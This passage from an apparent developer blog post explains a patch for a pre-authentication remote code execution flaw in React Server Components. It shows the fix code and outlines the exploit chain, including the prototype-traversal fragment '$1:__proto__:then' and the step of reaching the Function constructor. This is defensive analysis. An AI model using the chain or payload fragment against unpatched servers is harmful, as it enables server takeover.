class="nx">NAME</span><span class="p">]))</span> <span class="p">{</span> <span class="k">return</span> <span class="nx">moduleExports</span><span class="p">[</span><span class="nx">metadata</span><span class="p">[</span><span class="nx">NAME</span><span class="p">]];</span> <span class="p">}</span> <span class="k">return </span><span class="p">(</span><span class="kc">undefined</span><span class="p">:</span> <span class="nx">any</span><span class="p">);</span> <span class="c1">// Return undefined for non-existent exports</span> <span class="p">}</span> </code></pre> </div> <p>Sebastian Markbage noted this was "the other one" and added: <em>"The ones on the module is not that critical but good to have"</em> — meaning it's defense-in-depth, not the primary vulnerability.</p> <h2> Fix #3: Error Handling in <code>decodeReplyFromBusboy()</code> </h2> <p>The fix also adds proper error handling to prevent exploitation attempts from crashing the server in a way that might leak information:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// Field handling - wrapped in try-catch</span> <span class="nx">busboyStream</span><span class="p">.</span><span class="nf">on</span><span class="p">(</span><span class="dl">'</span><span class="s1">field</span><span class="dl">'</span><span class="p">,</span> <span class="p">(</span><span class="nx">name</span><span class="p">,</span> <span class="nx">value</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="nx">pendingFiles</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="nx">queuedFields</span><span class="p">.</span><span class="nf">push</span><span class="p">(</span><span class="nx">name</span><span class="p">,</span> <span class="nx">value</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="k">try</span> <span class="p">{</span> <span class="nf">resolveField</span><span class="p">(</span><span class="nx">response</span><span class="p">,</span> <span class="nx">name</span><span class="p">,</span> <span class="nx">value</span><span class="p">);</span> <span class="p">}</span> <span class="k">catch </span><span class="p">(</span><span class="nx">error</span><span class="p">)</span> <span class="p">{</span> <span class="nx">busboyStream</span><span class="p">.</span><span class="nf">destroy</span><span class="p">(</span><span class="nx">error</span><span class="p">);</span> <span class="c1">// Safely destroy stream on error</span> <span class="p">}</span> <span class="p">}</span> <span class="p">});</span> <span class="c1">// File completion handling - wrapped in try-catch</span> <span class="nx">value</span><span class="p">.</span><span class="nf">on</span><span class="p">(</span><span class="dl">'</span><span class="s1">end</span><span class="dl">'</span><span class="p">,</span> <span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">try</span> <span class="p">{</span> <span class="nf">resolveFileComplete</span><span class="p">(</span><span class="nx">response</span><span class="p">,</span> <span class="nx">name</span><span class="p">,</span> <span class="nx">file</span><span class="p">);</span> <span class="nx">pendingFiles</span><span class="o">--</span><span class="p">;</span> <span class="k">if </span><span class="p">(</span><span class="nx">pendingFiles</span> <span class="o">===</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="k">for </span><span class="p">(</span><span class="kd">let</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o">&lt;</span> <span class="nx">queuedFields</span><span class="p">.</span><span class="nx">length</span><span class="p">;</span> <span class="nx">i</span> <span class="o">+=</span> <span class="mi">2</span><span class="p">)</span> <span class="p">{</span> <span class="nf">resolveField</span><span class="p">(</span><span class="nx">response</span><span class="p">,</span> <span class="nx">queuedFields</span><span class="p">[</span><span class="nx">i</span><span class="p">],</span> <span class="nx">queuedFields</span><span class="p">[</span><span class="nx">i</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]);</span> <span class="p">}</span> <span class="nx">queuedFields</span><span class="p">.</span><span class="nx">length</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span> <span class="k">catch </span><span class="p">(</span><span class="nx">error</span><span class="p">)</span> <span class="p">{</span> <span class="nx">busboyStream</span><span class="p">.</span><span class="nf">destroy</span><span class="p">(</span><span class="nx">error</span><span class="p">);</span> <span class="c1">// Safely handle errors during file processing</span> <span class="p">}</span> <span class="p">});</span> </code></pre> </div> <h2> Why The Fix Works: Breaking the Exploit Chain </h2> <p>The exploit chain required <strong>all of these steps</strong> to work:</p> <ol> <li> <strong>Access <code>__proto__</code></strong> via path traversal → <strong>BLOCKED by Fix #1</strong> </li> <li>Traverse to <code>Chunk.prototype.then</code> → <strong>BLOCKED by Fix #1</strong> </li> <li>Create self-referential chunk → Still possible, but useless without step 1-2</li> <li>Trigger double deserialization → Still possible, but controlled data is now safe</li> <li>Access Function constructor → <strong>BLOCKED by Fix #1 and #2</strong> </li> </ol> <p>By adding <code>hasOwnProperty</code> checks at the critical points, the entire exploit chain collapses. The key insight is that this single missing check allows <code>$1:__proto__:then</code> to traverse from a chunk object, up the prototype chain, to <code>Chunk.prototype.then</code> — and the fix prevents exactly that.</p> <h2> Why This is So Bad </h2> <ol> <li> <strong>Works before authentication</strong> — happens during deserialization</li> <li> <strong>No user interaction needed</strong> — just send one HTTP request</li> <li> <strong>Default configurations vulnerable</strong> — no developer mistakes required</li> <li> <strong>Nearly 100% reliable</strong> — not a timing or race condition</li> <li> <strong>Complete RCE</strong> — attacker gets full server access</li> </ol> <p>This vulnerability is a masterclass in exploit chaining — taking multiple small weaknesses (prototype access, thenable handling, self-references, double deserialization) and combining them into complete remote code execution.</p> javascript react security